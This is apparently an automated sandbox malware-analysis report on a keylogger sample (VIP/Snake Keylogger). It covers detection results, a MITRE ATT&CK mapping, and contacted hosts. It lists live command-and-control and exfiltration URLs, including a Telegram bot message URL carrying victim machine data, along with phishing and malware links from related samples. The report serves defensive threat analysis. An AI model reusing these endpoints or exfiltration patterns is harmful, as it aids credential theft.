Source: Yara match	File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TLS20242025.exe	35%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
TLS20242025.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20a	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://www.office.com/P	0%	Avira URL Cloud	safe
https://www.office.com/lB	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enP	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enlB	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	193.122.130.0	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.33	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20a	TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/P	TLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/lB	TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en	TLS20242025.exe, 00000002.00000002.4585576245.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B8A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	TLS20242025.exe, 00000002.00000002.4585576245.0000000002CA2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enP	TLS20242025.exe, 00000002.00000002.4585576245.0000000002C98000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519460
Start date and time:	2024-09-26 15:18:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TLS20242025.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 79 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: TLS20242025.exe

Simulations

Behavior and APIs

Time	Type	Description
09:19:06	API Interceptor	11383189x Sleep call for process: TLS20242025.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	HpCQgSai4e.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Ky4pZ0WB/download
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	http://www.tiktok758.com/	Get hash	malicious	Unknown	Browse	www.tiktok758.com/img/logo.4c830710.svg
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2wnz/
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/DiF66Hbf/download
	http://easyantrim.pages.dev/id.html	Get hash	malicious	HTMLPhisher	Browse	easyantrim.pages.dev/id.html
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/13rSMZZi/download
193.122.130.0	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	checkip.dyndns.org/
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
checkip.dyndns.com	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.6.168
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
api.telegram.org	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3B	Get hash	malicious	Unknown	Browse	104.21.67.246
	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	REQUEST FOR QUOTATION.js	Get hash	malicious	PXRECVOWEIWOEI Stealer, PureLog Stealer	Browse	172.66.0.235
	https://www.google.to/url?url=https://bxaxlsoggszcwwbz&nzc=vvjpqcc&suvkdk=cmz&kwdec=vutety&cbb=sslsceg&pagnn=fuhmpw&dkqf=mwwhastk&ffmvozjupo=yqbyougxxo&q=amp/gm5bqhj.g%C2%ADb%C2%ADe%C2%ADym%C2%ADw%C2%ADc%C2%ADg%C2%ADv%C2%ADk%C2%ADb%C2%ADd%C2%ADevll.com%E2%80%8B/cbvogermm&clnw=xokmakg&dhxrdhh=zgwr&tievm=savxww&gfpizxn=fnv	Get hash	malicious	HTMLPhisher	Browse	104.21.235.70
	http://erptanacsadas.hu.pages.services/secure-business-document/?ts=1726767567620	Get hash	malicious	HtmlDropper	Browse	188.114.96.3
	https://forms.office.com/e/jUjy5zj0tM	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	You have a held messages (dawie@ddebeer.co.za).msg	Get hash	malicious	Unknown	Browse	1.1.1.1
	Payment-Remittance_pdfrexel.se959575798273.html	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	WG Viridium-gruppe requests your signature on 'Viridium-gruppe Employees Benefit Enrollment.pdf'.msg	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
ORACLE-BMC-31898US	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.6.168
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
